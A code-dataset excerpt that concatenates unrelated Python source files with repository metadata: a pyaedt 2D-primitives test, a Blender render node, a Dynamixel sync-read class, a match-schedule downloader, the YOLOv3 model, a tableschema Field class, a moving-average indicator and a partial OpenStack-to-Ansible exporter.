html_template = loader.get_template( 'error-404.html' )
return HttpResponse(html_template.render(context, request))
except:
html_template = loader.get_template( 'error-500.html' )
return HttpResponse(html_template.render(context, request))
| 31.486486 | 72 | 0.684979 |
3d42cf5e5530798f060c4d9a4855cb05c43d9438 | 3,251 | py | Python | _unittest/test_09_Primitives2D.py | pyansys/pyaedt | c7b045fede6bc707fb20a8db7d5680c66d8263f6 | [
"MIT"
] | 38 | 2021-10-01T23:15:26.000Z | 2022-03-30T18:14:41.000Z | _unittest/test_09_Primitives2D.py | pyansys/pyaedt | c7b045fede6bc707fb20a8db7d5680c66d8263f6 | [
"MIT"
] | 362 | 2021-09-30T17:11:55.000Z | 2022-03-31T13:36:20.000Z | _unittest/test_09_Primitives2D.py | pyansys/pyaedt | c7b045fede6bc707fb20a8db7d5680c66d8263f6 | [
"MIT"
] | 15 | 2021-09-30T20:21:02.000Z | 2022-02-21T20:22:03.000Z | #!/ekm/software/anaconda3/bin/python
# Import required modules
from _unittest.conftest import BasisTest
from pyaedt import Maxwell2d
from pyaedt.modeler.Primitives import Polyline
# Setup paths for module imports
try:
import pytest # noqa: F401
except ImportError:
import _unittest_ironpython.conf_unittest as pytest # noqa: F401
class TestClass(BasisTest, object):
def setup_class(self):
BasisTest.my_setup(self)
self.aedtapp = BasisTest.add_app(
self, design_name="2D_Primitives", solution_type="TransientXY", application=Maxwell2d
)
def teardown_class(self):
BasisTest.my_teardown(self)
def create_rectangle(self, name=None):
if not name:
name = "MyRectangle"
if self.aedtapp.modeler[name]:
self.aedtapp.modeler.delete(name)
o = self.aedtapp.modeler.create_rectangle([5, 3, 0], [4, 5], name=name)
return o
def test_02_create_primitive(self):
udp = self.aedtapp.modeler.Position(0, 0, 0)
o = self.aedtapp.modeler.create_rectangle(udp, [5, 3], name="Rectangle1", matname="copper")
assert isinstance(o.id, int)
assert o.solve_inside
def test_03_create_circle(self):
udp = self.aedtapp.modeler.Position(0, 0, 0)
o1 = self.aedtapp.modeler.create_circle(udp, 3, 0, name="Circle1", matname="copper")
assert isinstance(o1.id, int)
o2 = self.aedtapp.modeler.create_circle(udp, 3, 8, name="Circle2", matname="copper")
assert isinstance(o2.id, int)
def test_04_create_ellipse(self):
udp = self.aedtapp.modeler.Position(0, 0, 0)
o = self.aedtapp.modeler.create_ellipse(udp, 3, 2, name="Ellipse1", matname="copper")
assert isinstance(o.id, int)
def test_05_create_poly(self):
udp = [self.aedtapp.modeler.Position(0, 0, 0), self.aedtapp.modeler.Position(10, 5, 0)]
o = self.aedtapp.modeler.create_polyline(udp, name="Ellipse1", matname="copper")
assert isinstance(o, Polyline)
def test_chamfer_vertex(self):
o = self.create_rectangle("Rectangle1")
o.vertices[0].chamfer()
def test_fillet_vertex(self):
o = self.create_rectangle("Rectangle1")
o.vertices[0].fillet()
def test_06_create_region(self):
if self.aedtapp.modeler["Region"]:
self.aedtapp.modeler.delete("Region")
assert "Region" not in self.aedtapp.modeler.object_names
region = self.aedtapp.modeler.create_region([100, 100, 100, 100])
assert region.solve_inside
assert region.model
assert region.display_wireframe
assert region.object_type == "Sheet"
assert region.solve_inside
region = self.aedtapp.modeler.create_region([100, 100, 100, 100, 100, 100])
assert not region
def test_07_assign_material_ceramic(self, material="Ceramic_material"):
self.aedtapp.assign_material(["Rectangle1"], material)
assert self.aedtapp.modeler["Rectangle1"].material_name == material
def test_07_assign_material(self, material="steel_stainless"):
self.aedtapp.assign_material(["Rectangle1"], material)
assert self.aedtapp.modeler["Rectangle1"].material_name == material
| 38.247059 | 99 | 0.676715 |
cf42f7d201fac765dcba0fccb1122c5047e16af0 | 974 | py | Python | nodes/new_nodes/ObjectDisplay.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/new_nodes/ObjectDisplay.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/new_nodes/ObjectDisplay.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | import bpy
from bpy.props import *
from ...nodes.BASE.node_tree import RenderStackNode
class RenderNodeObjectDisplay(RenderStackNode):
bl_idname = 'RenderNodeObjectDisplay'
bl_label = 'Object Display +'
def init(self, context):
self.create_prop('RenderNodeSocketObject', 'object', 'Object')
self.create_prop('RenderNodeSocketBool', 'hide_viewport', 'Hide Viewport')
self.create_prop('RenderNodeSocketBool', 'hide_render', 'Hide Render')
self.outputs.new('RSNodeSocketTaskSettings', "Settings")
self.width = 175
def process(self):
self.store_data()
ob = self.node_dict['object']
if ob:
self.compare(ob, 'hide_viewport', self.node_dict['hide_viewport'])
self.compare(ob, 'hide_render', self.node_dict['hide_render'])
def register():
bpy.utils.register_class(RenderNodeObjectDisplay)
def unregister():
bpy.utils.unregister_class(RenderNodeObjectDisplay)
| 28.647059 | 82 | 0.694045 |
d4071f8109a219f65689e15a1bccaeb93eaa3aff | 4,668 | py | Python | build/dynamixel_sdk/catkin_generated/installspace/group_sync_read.py | sej0015/holonomic_turtle_bot | 4cc80bb27dfce0aa6f2bd975d79f6348acf40401 | [
"Apache-2.0"
] | null | null | null | build/dynamixel_sdk/catkin_generated/installspace/group_sync_read.py | sej0015/holonomic_turtle_bot | 4cc80bb27dfce0aa6f2bd975d79f6348acf40401 | [
"Apache-2.0"
] | null | null | null | build/dynamixel_sdk/catkin_generated/installspace/group_sync_read.py | sej0015/holonomic_turtle_bot | 4cc80bb27dfce0aa6f2bd975d79f6348acf40401 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
################################################################################
# Copyright 2017 ROBOTIS CO., LTD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
# Author: Ryu Woon Jung (Leon)
from .robotis_def import *
class GroupSyncRead:
def __init__(self, port, ph, start_address, data_length):
self.port = port
self.ph = ph
self.start_address = start_address
self.data_length = data_length
self.last_result = False
self.is_param_changed = False
self.param = []
self.data_dict = {}
self.clearParam()
def makeParam(self):
if self.ph.getProtocolVersion() == 1.0:
return
if not self.data_dict: # len(self.data_dict.keys()) == 0:
return
self.param = []
for dxl_id in self.data_dict:
self.param.append(dxl_id)
def addParam(self, dxl_id):
if self.ph.getProtocolVersion() == 1.0:
return False
if dxl_id in self.data_dict: # dxl_id already exist
return False
self.data_dict[dxl_id] = [] # [0] * self.data_length
self.is_param_changed = True
return True
def removeParam(self, dxl_id):
if self.ph.getProtocolVersion() == 1.0:
return
if dxl_id not in self.data_dict: # NOT exist
return
del self.data_dict[dxl_id]
self.is_param_changed = True
def clearParam(self):
if self.ph.getProtocolVersion() == 1.0:
return
self.data_dict.clear()
def txPacket(self):
if self.ph.getProtocolVersion() == 1.0 or len(self.data_dict.keys()) == 0:
return COMM_NOT_AVAILABLE
if self.is_param_changed is True or not self.param:
self.makeParam()
return self.ph.syncReadTx(self.port, self.start_address, self.data_length, self.param,
len(self.data_dict.keys()) * 1)
def rxPacket(self):
self.last_result = False
if self.ph.getProtocolVersion() == 1.0:
return COMM_NOT_AVAILABLE
result = COMM_RX_FAIL
if len(self.data_dict.keys()) == 0:
return COMM_NOT_AVAILABLE
for dxl_id in self.data_dict:
self.data_dict[dxl_id], result, _ = self.ph.readRx(self.port, dxl_id, self.data_length)
if result != COMM_SUCCESS:
return result
if result == COMM_SUCCESS:
self.last_result = True
return result
def txRxPacket(self):
if self.ph.getProtocolVersion() == 1.0:
return COMM_NOT_AVAILABLE
result = self.txPacket()
if result != COMM_SUCCESS:
return result
return self.rxPacket()
def isAvailable(self, dxl_id, address, data_length):
if self.ph.getProtocolVersion() == 1.0 or self.last_result is False or dxl_id not in self.data_dict:
return False
if (address < self.start_address) or (self.start_address + self.data_length - data_length < address):
return False
return True
def getData(self, dxl_id, address, data_length):
if not self.isAvailable(dxl_id, address, data_length):
return 0
if data_length == 1:
return self.data_dict[dxl_id][address - self.start_address]
elif data_length == 2:
return DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address],
self.data_dict[dxl_id][address - self.start_address + 1])
elif data_length == 4:
return DXL_MAKEDWORD(DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 0],
self.data_dict[dxl_id][address - self.start_address + 1]),
DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 2],
self.data_dict[dxl_id][address - self.start_address + 3]))
else:
return 0
| 31.972603 | 109 | 0.582905 |
502cdaeb8e282b1a66d3c63cf4ad3d14b7a247a3 | 992 | py | Python | src/match_downloader.py | mnuyens/forseti2 | 3c6d76ffac2b64d51f03d3922e3b388a4e35f1a8 | [
"Apache-2.0"
] | 1 | 2015-03-07T04:48:53.000Z | 2015-03-07T04:48:53.000Z | src/match_downloader.py | mnuyens/forseti2 | 3c6d76ffac2b64d51f03d3922e3b388a4e35f1a8 | [
"Apache-2.0"
] | null | null | null | src/match_downloader.py | mnuyens/forseti2 | 3c6d76ffac2b64d51f03d3922e3b388a4e35f1a8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2.7
from __future__ import print_function
import urllib
import argparse
import json
import os.path
match_dir = '../matches'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--start', type=int, action='store')
args = parser.parse_args()
match_exists = True
i = args.start
while match_exists:
print('Getting', i)
target_base = \
'https://pioneers.berkeley.edu/match_schedule/api/match/{}/'
try:
f = urllib.urlopen(target_base.format(i))
data = f.read()
obj = json.loads(data)
match_exists = obj.get(u'message', None) == u'success'
if match_exists:
with open(os.path.join(match_dir, '{}.match'.format(i)), 'w') as wfile:
wfile.write(data)
except Exception as ex:
print("Couldn't query", target_base.format(i), "got", ex)
i += 1
if __name__ == '__main__':
main()
| 27.555556 | 87 | 0.584677 |
706ea20e12f4787d581136e57f4c5e1bb6be267d | 12,102 | py | Python | models/yolo.py | bhecquet/image-fields-detector | bdb290df43dd4401ab501c3e87eddf6e69a201cc | [
"Apache-2.0"
] | null | null | null | models/yolo.py | bhecquet/image-fields-detector | bdb290df43dd4401ab501c3e87eddf6e69a201cc | [
"Apache-2.0"
] | null | null | null | models/yolo.py | bhecquet/image-fields-detector | bdb290df43dd4401ab501c3e87eddf6e69a201cc | [
"Apache-2.0"
] | 1 | 2021-12-27T15:03:37.000Z | 2021-12-27T15:03:37.000Z | # YOLOv3 YOLO-specific modules
import argparse
import logging
import sys
from copy import deepcopy
sys.path.append('./') # to run '$ python *.py' files in subdirectories
logger = logging.getLogger(__name__)
from models.common import *
from models.experimental import *
from utils.autoanchor import check_anchor_order
from utils.general import make_divisible, check_file, set_logging
from utils.torch_utils import time_synchronized, fuse_conv_and_bn, model_info, scale_img, initialize_weights, \
select_device, copy_attr
try:
import thop # for FLOPS computation
except ImportError:
thop = None
class Detect(nn.Module):
stride = None # strides computed during build
export = False # onnx export
def __init__(self, nc=80, anchors=(), ch=()): # detection layer
super(Detect, self).__init__()
self.nc = nc # number of classes
self.no = nc + 5 # number of outputs per anchor
self.nl = len(anchors) # number of detection layers
self.na = len(anchors[0]) // 2 # number of anchors
self.grid = [torch.zeros(1)] * self.nl # init grid
a = torch.tensor(anchors).float().view(self.nl, -1, 2)
self.register_buffer('anchors', a) # shape(nl,na,2)
self.register_buffer('anchor_grid', a.clone().view(self.nl, 1, -1, 1, 1, 2)) # shape(nl,1,na,1,1,2)
self.m = nn.ModuleList(nn.Conv2d(x, self.no * self.na, 1) for x in ch) # output conv
def forward(self, x):
# x = x.copy() # for profiling
z = [] # inference output
self.training |= self.export
for i in range(self.nl):
x[i] = self.m[i](x[i]) # conv
bs, _, ny, nx = x[i].shape # x(bs,255,20,20) to x(bs,3,20,20,85)
x[i] = x[i].view(bs, self.na, self.no, ny, nx).permute(0, 1, 3, 4, 2).contiguous()
if not self.training: # inference
if self.grid[i].shape[2:4] != x[i].shape[2:4]:
self.grid[i] = self._make_grid(nx, ny).to(x[i].device)
y = x[i].sigmoid()
y[..., 0:2] = (y[..., 0:2] * 2. - 0.5 + self.grid[i]) * self.stride[i] # xy
y[..., 2:4] = (y[..., 2:4] * 2) ** 2 * self.anchor_grid[i] # wh
z.append(y.view(bs, -1, self.no))
return x if self.training else (torch.cat(z, 1), x)
@staticmethod
def _make_grid(nx=20, ny=20):
yv, xv = torch.meshgrid([torch.arange(ny), torch.arange(nx)])
return torch.stack((xv, yv), 2).view((1, 1, ny, nx, 2)).float()
class Model(nn.Module):
def __init__(self, cfg='yolov3.yaml', ch=3, nc=None, anchors=None): # model, input channels, number of classes
super(Model, self).__init__()
if isinstance(cfg, dict):
self.yaml = cfg # model dict
else: # is *.yaml
import yaml # for torch hub
self.yaml_file = Path(cfg).name
with open(cfg) as f:
self.yaml = yaml.load(f, Loader=yaml.SafeLoader) # model dict
# Define model
ch = self.yaml['ch'] = self.yaml.get('ch', ch) # input channels
if nc and nc != self.yaml['nc']:
logger.info(f"Overriding model.yaml nc={self.yaml['nc']} with nc={nc}")
self.yaml['nc'] = nc # override yaml value
if anchors:
logger.info(f'Overriding model.yaml anchors with anchors={anchors}')
self.yaml['anchors'] = round(anchors) # override yaml value
self.model, self.save = parse_model(deepcopy(self.yaml), ch=[ch]) # model, savelist
self.names = [str(i) for i in range(self.yaml['nc'])] # default names
# print([x.shape for x in self.forward(torch.zeros(1, ch, 64, 64))])
# Build strides, anchors
m = self.model[-1] # Detect()
if isinstance(m, Detect):
s = 256 # 2x min stride
m.stride = torch.tensor([s / x.shape[-2] for x in self.forward(torch.zeros(1, ch, s, s))]) # forward
m.anchors /= m.stride.view(-1, 1, 1)
check_anchor_order(m)
self.stride = m.stride
self._initialize_biases() # only run once
# print('Strides: %s' % m.stride.tolist())
# Init weights, biases
initialize_weights(self)
self.info()
logger.info('')
def forward(self, x, augment=False, profile=False):
if augment:
img_size = x.shape[-2:] # height, width
s = [1, 0.83, 0.67] # scales
f = [None, 3, None] # flips (2-ud, 3-lr)
y = [] # outputs
for si, fi in zip(s, f):
xi = scale_img(x.flip(fi) if fi else x, si, gs=int(self.stride.max()))
yi = self.forward_once(xi)[0] # forward
# cv2.imwrite(f'img_{si}.jpg', 255 * xi[0].cpu().numpy().transpose((1, 2, 0))[:, :, ::-1]) # save
yi[..., :4] /= si # de-scale
if fi == 2:
yi[..., 1] = img_size[0] - yi[..., 1] # de-flip ud
elif fi == 3:
yi[..., 0] = img_size[1] - yi[..., 0] # de-flip lr
y.append(yi)
return torch.cat(y, 1), None # augmented inference, train
else:
return self.forward_once(x, profile) # single-scale inference, train
def forward_once(self, x, profile=False):
y, dt = [], [] # outputs
for m in self.model:
if m.f != -1: # if not from previous layer
x = y[m.f] if isinstance(m.f, int) else [x if j == -1 else y[j] for j in m.f] # from earlier layers
if profile:
o = thop.profile(m, inputs=(x,), verbose=False)[0] / 1E9 * 2 if thop else 0 # FLOPS
t = time_synchronized()
for _ in range(10):
_ = m(x)
dt.append((time_synchronized() - t) * 100)
print('%10.1f%10.0f%10.1fms %-40s' % (o, m.np, dt[-1], m.type))
x = m(x) # run
y.append(x if m.i in self.save else None) # save output
if profile:
print('%.1fms total' % sum(dt))
return x
def _initialize_biases(self, cf=None): # initialize biases into Detect(), cf is class frequency
# https://arxiv.org/abs/1708.02002 section 3.3
# cf = torch.bincount(torch.tensor(np.concatenate(dataset.labels, 0)[:, 0]).long(), minlength=nc) + 1.
m = self.model[-1] # Detect() module
for mi, s in zip(m.m, m.stride): # from
b = mi.bias.view(m.na, -1) # conv.bias(255) to (3,85)
b.data[:, 4] += math.log(8 / (640 / s) ** 2) # obj (8 objects per 640 image)
b.data[:, 5:] += math.log(0.6 / (m.nc - 0.99)) if cf is None else torch.log(cf / cf.sum()) # cls
mi.bias = torch.nn.Parameter(b.view(-1), requires_grad=True)
def _print_biases(self):
m = self.model[-1] # Detect() module
for mi in m.m: # from
b = mi.bias.detach().view(m.na, -1).T # conv.bias(255) to (3,85)
print(('%6g Conv2d.bias:' + '%10.3g' * 6) % (mi.weight.shape[1], *b[:5].mean(1).tolist(), b[5:].mean()))
# def _print_weights(self):
# for m in self.model.modules():
# if type(m) is Bottleneck:
# print('%10.3g' % (m.w.detach().sigmoid() * 2)) # shortcut weights
def fuse(self): # fuse model Conv2d() + BatchNorm2d() layers
print('Fusing layers... ')
for m in self.model.modules():
if type(m) is Conv and hasattr(m, 'bn'):
m.conv = fuse_conv_and_bn(m.conv, m.bn) # update conv
delattr(m, 'bn') # remove batchnorm
m.forward = m.fuseforward # update forward
self.info()
return self
def nms(self, mode=True): # add or remove NMS module
present = type(self.model[-1]) is NMS # last layer is NMS
if mode and not present:
print('Adding NMS... ')
m = NMS() # module
m.f = -1 # from
m.i = self.model[-1].i + 1 # index
self.model.add_module(name='%s' % m.i, module=m) # add
self.eval()
elif not mode and present:
print('Removing NMS... ')
self.model = self.model[:-1] # remove
return self
def autoshape(self): # add autoShape module
print('Adding autoShape... ')
m = autoShape(self) # wrap model
copy_attr(m, self, include=('yaml', 'nc', 'hyp', 'names', 'stride'), exclude=()) # copy attributes
return m
def info(self, verbose=False, img_size=640): # print model information
model_info(self, verbose, img_size)
def parse_model(d, ch): # model_dict, input_channels(3)
logger.info('\n%3s%18s%3s%10s %-40s%-30s' % ('', 'from', 'n', 'params', 'module', 'arguments'))
anchors, nc, gd, gw = d['anchors'], d['nc'], d['depth_multiple'], d['width_multiple']
na = (len(anchors[0]) // 2) if isinstance(anchors, list) else anchors # number of anchors
no = na * (nc + 5) # number of outputs = anchors * (classes + 5)
layers, save, c2 = [], [], ch[-1] # layers, savelist, ch out
for i, (f, n, m, args) in enumerate(d['backbone'] + d['head']): # from, number, module, args
m = eval(m) if isinstance(m, str) else m # eval strings
for j, a in enumerate(args):
try:
args[j] = eval(a) if isinstance(a, str) else a # eval strings
except:
pass
n = max(round(n * gd), 1) if n > 1 else n # depth gain
if m in [Conv, GhostConv, Bottleneck, GhostBottleneck, SPP, DWConv, MixConv2d, Focus, CrossConv, BottleneckCSP,
C3, C3TR]:
c1, c2 = ch[f], args[0]
if c2 != no: # if not output
c2 = make_divisible(c2 * gw, 8)
args = [c1, c2, *args[1:]]
if m in [BottleneckCSP, C3, C3TR]:
args.insert(2, n) # number of repeats
n = 1
elif m is nn.BatchNorm2d:
args = [ch[f]]
elif m is Concat:
c2 = sum([ch[x] for x in f])
elif m is Detect:
args.append([ch[x] for x in f])
if isinstance(args[1], int): # number of anchors
args[1] = [list(range(args[1] * 2))] * len(f)
elif m is Contract:
c2 = ch[f] * args[0] ** 2
elif m is Expand:
c2 = ch[f] // args[0] ** 2
else:
c2 = ch[f]
m_ = nn.Sequential(*[m(*args) for _ in range(n)]) if n > 1 else m(*args) # module
t = str(m)[8:-2].replace('__main__.', '') # module type
np = sum([x.numel() for x in m_.parameters()]) # number params
m_.i, m_.f, m_.type, m_.np = i, f, t, np # attach index, 'from' index, type, number params
logger.info('%3s%18s%3s%10.0f %-40s%-30s' % (i, f, n, np, t, args)) # print
save.extend(x % i for x in ([f] if isinstance(f, int) else f) if x != -1) # append to savelist
layers.append(m_)
if i == 0:
ch = []
ch.append(c2)
return nn.Sequential(*layers), sorted(save)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--cfg', type=str, default='yolov3.yaml', help='model.yaml')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
opt = parser.parse_args()
opt.cfg = check_file(opt.cfg) # check file
set_logging()
device = select_device(opt.device)
# Create model
model = Model(opt.cfg).to(device)
model.train()
# Profile
# img = torch.rand(8 if torch.cuda.is_available() else 1, 3, 640, 640).to(device)
# y = model(img, profile=True)
# Tensorboard
# from torch.utils.tensorboard import SummaryWriter
# tb_writer = SummaryWriter()
# print("Run 'tensorboard --logdir=models/runs' to view tensorboard at http://localhost:6006/")
# tb_writer.add_graph(model.model, img) # add model to tensorboard
# tb_writer.add_image('test', img[0], dataformats='CWH') # add model to tensorboard
| 43.532374 | 119 | 0.541977 |
f1a4679219df22cbbd18651f28bec702894cf767 | 6,363 | py | Python | tableschema/field.py | theotheo/tableschema-py | f308b48ce7d185d82a4a958830db190701abb7d0 | [
"MIT"
] | null | null | null | tableschema/field.py | theotheo/tableschema-py | f308b48ce7d185d82a4a958830db190701abb7d0 | [
"MIT"
] | null | null | null | tableschema/field.py | theotheo/tableschema-py | f308b48ce7d185d82a4a958830db190701abb7d0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from functools import partial
from .profile import Profile
from . import constraints
from . import exceptions
from . import helpers
from . import config
from . import types
# Module API
class Field(object):
"""Field representaion
# Arguments
descriptor (dict): schema field descriptor
missingValues (str[]): an array with string representing missing values
# Raises
TableSchemaException: raises any error that occurs during the process
"""
# Public
def __init__(self, descriptor, missing_values=config.DEFAULT_MISSING_VALUES,
# Internal
schema=None):
# Process descriptor
descriptor = helpers.expand_field_descriptor(descriptor)
# Set attributes
self.__descriptor = descriptor
self.__missing_values = missing_values
self.__schema = schema
self.__cast_function = self.__get_cast_function()
self.__check_functions = self.__get_check_functions()
@property
def schema(self):
"""Returns a schema instance if the field belongs to some schema
# Returns
Schema: field's schema
"""
return self.__schema
@property
def name(self):
"""Field name
# Returns
str: field name
"""
return self.__descriptor.get('name')
@property
def type(self):
"""Field type
# Returns
str: field type
"""
return self.__descriptor.get('type')
@property
def format(self):
"""Field format
# Returns
str: field format
"""
return self.__descriptor.get('format')
@property
def required(self):
"""Whether field is required
# Returns
bool: true if required
"""
return self.constraints.get('required', False)
@property
def constraints(self):
"""Field constraints
# Returns
dict: dict of field constraints
"""
return self.__descriptor.get('constraints', {})
@property
def descriptor(self):
"""Fields's descriptor
# Returns
dict: descriptor
"""
return self.__descriptor
def cast_value(self, value, constraints=True, preserve_missing_values=False):
"""Cast given value according to the field type and format.
# Arguments
value (any): value to cast against field
constraints (boll/str[]): gets constraints configuration
- it could be set to true to disable constraint checks
- it could be an Array of constraints to check e.g. ['minimum', 'maximum']
# Raises
TableSchemaException: raises any error that occurs during the process
# Returns
any: returns cast value
"""
# Null value
if value in self.__missing_values:
# If missing_values should be preserved without being cast
if preserve_missing_values:
return value
value = None
# Cast value
cast_value = value
if value is not None:
cast_value = self.__cast_function(value)
if cast_value == config.ERROR:
raise exceptions.CastError((
'Field "{field.name}" can\'t cast value "{value}" '
'for type "{field.type}" with format "{field.format}"'
).format(field=self, value=value))
# Check value
if constraints:
for name, check in self.__check_functions.items():
if isinstance(constraints, list):
if name not in constraints:
continue
passed = check(cast_value)
if not passed:
raise exceptions.CastError((
'Field "{field.name}" has constraint "{name}" '
'which is not satisfied for value "{value}"'
).format(field=self, name=name, value=value))
return cast_value
def test_value(self, value, constraints=True):
"""Test whether value is compliant to the field.
# Arguments
value (any): value to cast against field
constraints (bool/str[]): constraints configuration
# Returns
bool: returns if value is compliant to the field
"""
try:
self.cast_value(value, constraints=constraints)
except exceptions.CastError:
return False
return True
# Private
def __get_cast_function(self):
options = {}
# Get cast options
for key in ['decimalChar', 'groupChar', 'bareNumber', 'trueValues', 'falseValues']:
value = self.descriptor.get(key)
if value is not None:
options[key] = value
cast = getattr(types, 'cast_%s' % self.type)
cast = partial(cast, self.format, **options)
return cast
def __get_check_functions(self):
checks = {}
cast = partial(self.cast_value, constraints=False)
whitelist = _get_field_constraints(self.type)
for name, constraint in self.constraints.items():
if name in whitelist:
# Cast enum constraint
if name in ['enum']:
constraint = list(map(cast, constraint))
# Cast maximum/minimum constraint
if name in ['maximum', 'minimum']:
constraint = cast(constraint)
check = getattr(constraints, 'check_%s' % name)
checks[name] = partial(check, constraint)
return checks
# Internal
def _get_field_constraints(type):
# Extract list of constraints for given type from jsonschema
jsonschema = Profile('table-schema').jsonschema
profile_types = jsonschema['properties']['fields']['items']['anyOf']
for profile_type in profile_types:
if type in profile_type['properties']['type']['enum']:
return profile_type['properties']['constraints']['properties'].keys()
| 28.791855 | 91 | 0.583687 |
f6d93bd85c04ce266158b03facdb42e14b1490c5 | 1,531 | py | Python | indicators.py | guibuenorodrigues/robot-trader | 2fdf59870a1f3435a7697b521701df70f3aaebb2 | [
"MIT"
] | null | null | null | indicators.py | guibuenorodrigues/robot-trader | 2fdf59870a1f3435a7697b521701df70f3aaebb2 | [
"MIT"
] | null | null | null | indicators.py | guibuenorodrigues/robot-trader | 2fdf59870a1f3435a7697b521701df70f3aaebb2 | [
"MIT"
] | 1 | 2021-12-08T03:43:28.000Z | 2021-12-08T03:43:28.000Z | import logging
from typing import Tuple
from numpy.lib.function_base import average
import pandas as pd
import math
from ticker import Ticker
class Indicators:
def __init__(self) -> None:
self.logger = logging.getLogger(__name__)
self.averages_low = []
self.averages_high = []
self.average_period_low = 0
self.average_period_high = 0
def add_value_to_move_average_data(self, last: float, period: list):
self.average_period_low = min(period)
self.average_period_high = max(period)
self.averages_low.append(last)
self.averages_high.append(last)
def calculate_simple_move_average(self, kind: str = 'low') -> Tuple:
if kind == 'low':
period = self.average_period_low
averages = self.averages_low
else:
period = self.average_period_high
averages = self.averages_high
numbers_series = pd.Series(averages)
windows = numbers_series.rolling(period)
moving_averages = windows.mean()
moving_averages_list = moving_averages.tolist()
sma_previous = moving_averages_list[-2] if len(moving_averages_list) >= period else 0
sma_current = moving_averages_list[-1] if len(moving_averages_list) >= period else 0
return sma_previous, sma_current
def __index_in_list(self, a_list: list, index: int) -> bool:
print((index < len(a_list)))
return (index < len(a_list))
| 27.836364 | 93 | 0.646636 |
f5f50f34c77949680bf36dff3e1d919a9d8f995b | 30,855 | py | Python | openstack_ansible/openstack_ansible.py | jfrancoa/os-migrate | 3c48ef8f5a42edf5d0afd20b8fea969b287f8b46 | [
"Apache-2.0"
] | null | null | null | openstack_ansible/openstack_ansible.py | jfrancoa/os-migrate | 3c48ef8f5a42edf5d0afd20b8fea969b287f8b46 | [
"Apache-2.0"
] | null | null | null | openstack_ansible/openstack_ansible.py | jfrancoa/os-migrate | 3c48ef8f5a42edf5d0afd20b8fea969b287f8b46 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import os
import openstack
from plugins.os_ansible import config as conf
from plugins.os_ansible import const
from plugins.os_ansible.common import value, optimize, write_yaml
class OpenstackAnsible:
def __init__(self, cloud_name, debug=False):
self.debug = debug
self.data = {}
self.stor_path = None
self.net_path = None
self.comp_path = None
self.iden_path = None
self.cloud = cloud_name
self.get_info()
def run(self):
self.initialize_directories()
if conf.DUMP_NETWORKS:
self.dump_networks()
if conf.DUMP_STORAGE:
self.dump_storage()
if conf.DUMP_SERVERS:
self.dump_servers()
if conf.DUMP_IDENTITY:
self.dump_identity()
self.write_playbook()
def get_info(self):
conn = openstack.connect(cloud=self.cloud)
# pylint: disable=maybe-no-member
if self.debug:
openstack.enable_logging(debug=True)
if conf.DUMP_NETWORKS:
self.data['networks'] = list(conn.network.networks())
self.data['subnets'] = list(conn.network.subnets())
self.data['secgroups'] = list(conn.network.security_groups())
self.data['routers'] = list(conn.network.routers())
self.data['ports'] = list(conn.network.ports())
if conf.DUMP_STORAGE:
self.data['images'] = list(conn.image.images())
self.data['volumes'] = list(conn.volume.volumes())
if conf.DUMP_SERVERS:
self.data['servers'] = list(conn.compute.servers())
self.data['keypairs'] = list(conn.compute.keypairs())
self.data['flavors'] = list(conn.compute.flavors())
if conf.DUMP_IDENTITY:
self.data['users'] = list(conn.identity.users())
self.data['domains'] = list(conn.identity.domains())
self.data['projects'] = list(conn.identity.projects())
def initialize_directories(self):
if not os.path.exists(conf.PLAYS):
os.makedirs(conf.PLAYS)
if not os.path.exists(os.path.dirname(conf.VARS_PATH)):
os.makedirs(os.path.dirname(conf.VARS_PATH))
with open(conf.VARS_PATH, "w") as e:
e.write("---\n")
if conf.DUMP_NETWORKS:
self.net_path = os.path.join(conf.PLAYS, "networks")
if not os.path.exists(self.net_path):
os.makedirs(self.net_path)
if conf.DUMP_STORAGE:
self.stor_path = os.path.join(conf.PLAYS, "storage")
if not os.path.exists(self.stor_path):
os.makedirs(self.stor_path)
if conf.DUMP_SERVERS:
self.comp_path = os.path.join(conf.PLAYS, "compute")
if not os.path.exists(self.comp_path):
os.makedirs(self.comp_path)
if conf.DUMP_IDENTITY:
self.iden_path = os.path.join(conf.PLAYS, "identity")
if not os.path.exists(self.iden_path):
os.makedirs(self.iden_path)
def dump_networks(self):
net_funcs = {
const.FILE_NETWORKS: self.create_networks,
const.FILE_SUBNETS: self.create_subnets,
const.FILE_SECURITY_GROUPS: self.create_security_groups,
const.FILE_ROUTERS: self.create_routers,
}
for net_file, func in net_funcs.items():
path = os.path.join(self.net_path, net_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def dump_storage(self):
stor_funcs = {
const.FILE_IMAGES: self.create_images,
const.FILE_VOLUMES: self.create_volumes,
}
for stor_file, func in stor_funcs.items():
path = os.path.join(self.stor_path, stor_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def dump_servers(self):
comp_funcs = {
const.FILE_KEYPAIRS: self.create_keypairs,
const.FILE_SERVERS: self.create_servers,
const.FILE_FLAVORS: self.create_flavors,
}
for comp_file, func in comp_funcs.items():
path = os.path.join(self.comp_path, comp_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def dump_identity(self):
iden_funcs = {
const.FILE_USERS: self.create_users,
const.FILE_DOMAINS: self.create_domains,
